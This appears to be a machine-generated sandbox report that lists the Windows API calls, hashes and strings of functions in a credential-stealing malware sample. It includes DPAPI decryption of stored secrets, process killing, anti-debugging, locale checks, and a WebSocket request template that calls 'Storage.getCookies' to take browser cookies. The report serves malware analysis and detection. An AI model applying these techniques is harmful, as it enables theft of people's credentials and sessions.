String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:${"id":1,"method":"Storage.getCookies"}
API String ID: 3894209532-2542051906
Opcode ID: 2c02f43e80fdb22543ee2f5fdcc23f2269a07eec7a12fc3b6d6b99d7bf9ca6a8
Instruction ID: c9b8c444defc3cd8e88e9cc7441fac9a54f7cc798afff3ef4cf643562abb32ba
Opcode Fuzzy Hash: 2c02f43e80fdb22543ee2f5fdcc23f2269a07eec7a12fc3b6d6b99d7bf9ca6a8
Instruction Fuzzy Hash: 1AA24671D012699FDB20DBA8C8407EDBBB6FF88300F1481AAE519E7241DB755E85CF91

Function 0082D987 Relevance: 21.2, APIs: 14, Instructions: 183stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0082D9A4
FindFirstFileA.KERNEL32(?,?), ref: 0082D9BB
StrCmpCA.SHLWAPI(?,004317A8), ref: 0082D9DB
StrCmpCA.SHLWAPI(?,004317AC), ref: 0082D9F5
lstrcat.KERNEL32(?,00638D24), ref: 0082DA3A
lstrcat.KERNEL32(?,00638BF8), ref: 0082DA4E
lstrcat.KERNEL32(?,?), ref: 0082DA62
lstrcat.KERNEL32(?,?), ref: 0082DA73
lstrcat.KERNEL32(?,0043179C), ref: 0082DA85
lstrcat.KERNEL32(?,?), ref: 0082DA99
lstrcpy.KERNEL32(00000000,?), ref: 0082DAD9
lstrcpy.KERNEL32(00000000,?), ref: 0082DB29
FindNextFileA.KERNEL32(00000000,?), ref: 0082DB8E
FindClose.KERNEL32(00000000), ref: 0082DB9D

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
String ID:
API String ID: 50252434-0
Opcode ID: aa3c458722a05670dcd30bd18720c9770d2d35e28b11d85254eaa185a3130242
Instruction ID: 64fde97e40cfe49b50e223c46b99aa0b128f8374e58aee13ef2ff6e75547f357
Opcode Fuzzy Hash: aa3c458722a05670dcd30bd18720c9770d2d35e28b11d85254eaa185a3130242
Instruction Fuzzy Hash: 086164B59002199BCF14EF74DC88ADD7BB9FF48314F0085A9E649E7250EB74AA94CF90

Function 00834B17 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00834B30
Process32First.KERNEL32(00000000,00000128), ref: 00834B40
Process32Next.KERNEL32(00000000,00000128), ref: 00834B52
StrCmpCA.SHLWAPI(?,?), ref: 00834B64
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00834B79
TerminateProcess.KERNEL32(00000000,00000000), ref: 00834B88
CloseHandle.KERNEL32(00000000), ref: 00834B8F
Process32Next.KERNEL32(00000000,00000128), ref: 00834B9D
CloseHandle.KERNEL32(00000000), ref: 00834BA8

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction ID: c09254daadb98c29a71b0234b1b17c1a7c6929dbf14a308da6faaf8519478236
Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction Fuzzy Hash: 98012D31601214ABE7215BA0DC89FFA777EEB88B61F00119CF905D6190EFB4E9958EF1

Function 004248B0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004248C9
Process32First.KERNEL32(00000000,00000128), ref: 004248D9
Process32Next.KERNEL32(00000000,00000128), ref: 004248EB
StrCmpCA.SHLWAPI(?,?), ref: 004248FD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424912
TerminateProcess.KERNEL32(00000000,00000000), ref: 00424921
CloseHandle.KERNEL32(00000000), ref: 00424928
Process32Next.KERNEL32(00000000,00000128), ref: 00424936
CloseHandle.KERNEL32(00000000), ref: 00424941

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction ID: 956b9cb34166e2898696d065da2ac792d61c713baa536d295fc307e1a52bb286
Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
Instruction Fuzzy Hash: 44016D71601224ABE7215B70EC89FFB377DEB88B51F00119DF90596290EFB899848EB5

Function 00824EF0 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00824F18
lstrcpy.KERNEL32(00000000,00000000), ref: 00824F3B
lstrcat.KERNEL32(00000000,00000000), ref: 00824F46
lstrlen.KERNEL32(00434CAC), ref: 00824F51
lstrcpy.KERNEL32(00000000,00000000), ref: 00824F6E
lstrcat.KERNEL32(00000000,00434CAC), ref: 00824F7A
lstrcpy.KERNEL32(00000000,00000000), ref: 00824FA5
FindFirstFileA.KERNEL32(00000000,?), ref: 00824FC1

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID:
API String ID: 2567437900-0
Opcode ID: e103f0fab652abe6e811da4b320a149eb3a89e47f9aaa1190d755422a46d86f2
Instruction ID: 7cbde8d65996cf9a233898b86387abadd2c849b3746cdad9e461d683f59bf341
Opcode Fuzzy Hash: e103f0fab652abe6e811da4b320a149eb3a89e47f9aaa1190d755422a46d86f2
Instruction Fuzzy Hash: 0A316BB51005669BCB24EF68ED85EDD77AAFF80304F005124F904D7651EB78ACA5CBE2

Function 00833197 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00837657: lstrcpy.KERNEL32(00000000,ERROR), ref: 00837675

GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008331D2
LocalAlloc.KERNEL32(00000040,00000000), ref: 008331E4
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008331F1
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00833223
LocalFree.KERNEL32(00000000), ref: 00833401

Strings

/ , xrefs: 00833236

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 6e1af8beb043d4afca4c9ed596fec68a4aa17abd83587b054968690a8e6b9b0e
Instruction ID: 449a6bbfe45ce539d23f9561eda5d6c48fdf5c34d30a9e0c459a166930b30a66
Opcode Fuzzy Hash: 6e1af8beb043d4afca4c9ed596fec68a4aa17abd83587b054968690a8e6b9b0e
Instruction Fuzzy Hash: 2BB10671900204CFD715CF58D948BA9B7B1FB84329F29C1A9D409AB2A2D7B69D82CFD0

Function 0081EDE7 Relevance: 9.1, APIs: 6, Instructions: 96stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0081EE12
lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0081EE2D
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0081EE35
memcpy.MSVCRT(?,?,?), ref: 0081EEA8
lstrcat.KERNEL32(0042CFF4,0042CFF4), ref: 0081EEDE
lstrcat.KERNEL32(0042CFF4,0042CFF4), ref: 0081EF00

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 222f0d259b2c214552297249e9a3b322e57b2decec15fe8bba59d539fa695331
Instruction ID: 68a565bc39256439bae55a27e8823e65f0c4c5e9d697385400796f03543486e9
Opcode Fuzzy Hash: 222f0d259b2c214552297249e9a3b322e57b2decec15fe8bba59d539fa695331
Instruction Fuzzy Hash: DB319775B04219ABDB10CB98EC45BEE7779EF44705F044179F909E2280DBB45A44CBE5

Function 00834A87 Relevance: 9.0, APIs: 6, Instructions: 45processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00834A9F
Process32First.KERNEL32(00000000,00000128), ref: 00834AAF
Process32Next.KERNEL32(00000000,00000128), ref: 00834AC1
StrCmpCA.SHLWAPI(?,00435084), ref: 00834AD7
Process32Next.KERNEL32(00000000,00000128), ref: 00834AE9
CloseHandle.KERNEL32(00000000), ref: 00834AF4

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
String ID:
API String ID: 2284531361-0
Opcode ID: 0a4584e588e2a1bd53d0dc5be3f63ae9425af6167d0c2907f6cf8e63ec5e0e21
Instruction ID: 5dc3641b5893ce0a618d52976bcf856dfd74430cd77d8987aa9cb5e9482e72c0
Opcode Fuzzy Hash: 0a4584e588e2a1bd53d0dc5be3f63ae9425af6167d0c2907f6cf8e63ec5e0e21
Instruction Fuzzy Hash: 58014B31641228ABD720AB60AC89FEA77BDEF48751F0411D9F908D2140EFB59A948EE5

Function 00833047 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00833079
RtlAllocateHeap.NTDLL(00000000), ref: 00833080
GetTimeZoneInformation.KERNEL32(?), ref: 0083308F
wsprintfA.USER32 ref: 008330BA

Strings

wwww, xrefs: 008330A0

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 3317088062-671953474
Opcode ID: 90b710c9931f944b22adb0b58dfc5f5fa46652bc0e070347157d94c4ec96aef4
Instruction ID: f0f10905a6e5d5c17c5b2d1fdab31b9ce144b7c5d6afaebcf825d0671a8d7451
Opcode Fuzzy Hash: 90b710c9931f944b22adb0b58dfc5f5fa46652bc0e070347157d94c4ec96aef4
Instruction Fuzzy Hash: 9501F771A04604ABC71C9B58DC4AF6AB76AE784720F10436AF916DB2C0D7B459008AE5

Function 00838011 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00838879
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0083888E
UnhandledExceptionFilter.KERNEL32(0042C298), ref: 00838899
GetCurrentProcess.KERNEL32(C0000409), ref: 008388B5
TerminateProcess.KERNEL32(00000000), ref: 008388BC

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 81133d0f59986b58adb243c707ef71d8ad7c18327483a8e6b33276d8b1410e24
Instruction ID: cacbb698c35f8edbf9ac20037a4be0adcee0f90d86dd57d045bfe2576eea3d00
Opcode Fuzzy Hash: 81133d0f59986b58adb243c707ef71d8ad7c18327483a8e6b33276d8b1410e24
Instruction Fuzzy Hash: 8F21EFB5900306DFC761DF14F984A48BBB4FB68304F60607EF81887762EBB065858B9D

Function 008179B7 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 008179C5
RtlAllocateHeap.NTDLL(00000000), ref: 008179CC
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008179F4
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00817A14
LocalFree.KERNEL32(?), ref: 00817A1E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 606944bcdec5724d804e7c76de285d70bc7c280fcd7ac75521bbf4a12dce81bd
Instruction ID: 4a9f0c2b74acb6b0503c15ea75a934b66afdca92dc7e1166567a3a951315bcb1
Opcode Fuzzy Hash: 606944bcdec5724d804e7c76de285d70bc7c280fcd7ac75521bbf4a12dce81bd
Instruction Fuzzy Hash: 8D011275B443187BEB14DB949C4AFAA7779EB44B15F104159FB09EB2C0D6F099008BE4

Function 00407750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
HeapAlloc.KERNEL32(00000000), ref: 00407765
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
LocalFree.KERNEL32(?), ref: 004077B7

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 606944bcdec5724d804e7c76de285d70bc7c280fcd7ac75521bbf4a12dce81bd
Instruction ID: 7fa361070e6919b9c387aeb0df070321f657dace02b2a1325b51809b71c78810
Opcode Fuzzy Hash: 606944bcdec5724d804e7c76de285d70bc7c280fcd7ac75521bbf4a12dce81bd
Instruction Fuzzy Hash: F7011275B443187BEB14DB949C4AFAA7B79EB44B15F104159FA05EB2C0D6F0A9008BE4

Function 00834527 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00834544
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00834553
RtlAllocateHeap.NTDLL(00000000), ref: 0083455A
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 0083458A

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocateProcess
String ID:
API String ID: 3825993179-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: aff4dea30855ecfab701e0cd5a5bc2916378ae10df9fae6623ff19882c57553d
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: 17012C71A00205BFDB14DFA5EC89BAABBADEF85311F109059BD09C7240DB70E940CBA0

Function 004242C0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004242DD
GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004242EC
HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004242F3
CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00424323

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: BinaryCryptHeapString$AllocProcess
String ID:
API String ID: 3939037734-0
Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction ID: 9713ce4537880be7ab514a821b153c94c7b12f34070f0629a2b55f5b2daa99c3
Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
Instruction Fuzzy Hash: B8015A70600215ABDB108FA5EC89BABBBADEF88311F108199BD09C7340DA7099408BA4

Function 00819DE7 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00819E06
LocalAlloc.KERNEL32(00000040,?), ref: 00819E1A
memcpy.MSVCRT(00000000,?), ref: 00819E31
LocalFree.KERNEL32(?), ref: 00819E3E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: ae468c2bb1bddb76f1a09166d5ed19d0aab56abd70dce6a54ac79942b5779c1c
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: 3501FB75A41305ABD711DBA4DC55BAAB779EB44700F104158FA04EB280DBB09A418BE4

Function 00409B80 Relevance: 6.0, APIs: 4, Instructions: 43memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B9F
LocalAlloc.KERNEL32(00000040,?), ref: 00409BB3
memcpy.MSVCRT(00000000,?), ref: 00409BCA
LocalFree.KERNEL32(?), ref: 00409BD7

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction ID: a8d62dfbe6203375accfd57a9289b477ef975779ddea21d9cd908cb540d9be87
Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
Instruction Fuzzy Hash: 3101FB75A41309ABD7109BA4DC45BABB779EB44700F104169FA04AB381EBB4AE008BE5

Function 00819D87 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00819DA2
LocalAlloc.KERNEL32(00000040,00000000), ref: 00819DB1
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00819DC8
LocalFree.KERNEL32 ref: 00819DD7

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction ID: 89c306ba0cb71a4ca4ecd3cf5e504d5f6f141675ae31fccb4fab4892dc8337f1
Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction Fuzzy Hash: 38F0D0703443126BF7305F65AC59FA67BADEF04B51F240414FA49EA2C0EBF49880CBA4

Function 00409B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B3B
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B4A
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B61
LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B70

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction ID: fdb19b52b522e7fb6258fb386c859728d3eb4189d8c812c623f7d3b132898295
Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
Instruction Fuzzy Hash: 89F0BD703443126BE7305F65AC49F577BA9EF04B61F240515FA45EA2D0D7B49C40CAA4

Function 00424040 Relevance: 4.6, APIs: 3, Instructions: 124stringtimeCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00424075
lstrcpy.KERNEL32(00000000,0090CC60), ref: 0042409F
GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404DFA,?,00000014), ref: 004240A9

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$SystemTime
String ID:
API String ID: 684065273-0
Opcode ID: ce5b4261033255a37051479331282541e8acf544cb86b877d26dde90df024195
Instruction ID: b7da3cd01d155b234edc39c02d42c10be69608ef196fe4c56ff7908daca65438
Opcode Fuzzy Hash: ce5b4261033255a37051479331282541e8acf544cb86b877d26dde90df024195
Instruction Fuzzy Hash: 1941C070B012258FDB14CF25D888666BBE5FF49314F4980AED845DB3A2C779DC82CB94

Function 0082CF29 Relevance: 4.6, APIs: 3, Instructions: 102comstringCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0042B118,00000000,00000001,0042B108,?), ref: 0082CF5D
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0082CF9D
lstrcpyn.KERNEL32(?,?,00000104), ref: 0082D020

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWidelstrcpyn
String ID:
API String ID: 1940255200-0
Opcode ID: 6b054bc3ed76e03b3c8d476564611060be1a67b8d02412b6fca3c0074aada483
Instruction ID: 2807388e6667fec8bc303a5aee90fd8c93551662c396495d54175c038550973b
Opcode Fuzzy Hash: 6b054bc3ed76e03b3c8d476564611060be1a67b8d02412b6fca3c0074aada483
Instruction Fuzzy Hash: DD318271A40725AFD710DB94DC81FA9B7B9EB88B10F104185FA04EB2D0D7B1AE45CBA0

Function 0081092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 008109DC, 008109DF, 008109E4
l, xrefs: 00810966
., xrefs: 0081095F

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: a7102a0f231689fd65fa398c2c22b4531c2a6e7a60fdd3dc0dfb7c8f969c8fff
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: DD3118B6900619DFDB10CF99C880AEDBBF9FF48324F25414AD441E7211D7B1AA85CFA4

Function 00839BF0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00429947), ref: 00839BF5

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
